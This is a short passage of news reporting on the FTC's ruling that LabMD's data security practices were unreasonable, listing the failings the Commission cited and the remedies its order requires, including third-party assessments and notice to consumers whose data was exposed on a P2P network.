In its ruling, the FTC stated that the administrative law judge used the wrong legal standard for the unfairness prong, and stated that LabMD’s security practices were unreasonable, among other failings, because the company “failed to use an intrusion detection system or file integrity monitoring, neglected to monitor traffic coming across its firewalls, provided essentially no data security training to its employees, and never deleted any of the consumer data it had collected.”

The order requires LabMD to establish a comprehensive information security program, obtain periodic third-party assessments of its security program and notify consumers whose personal information was exposed on the P2P network. LabMD has 60 days to appeal.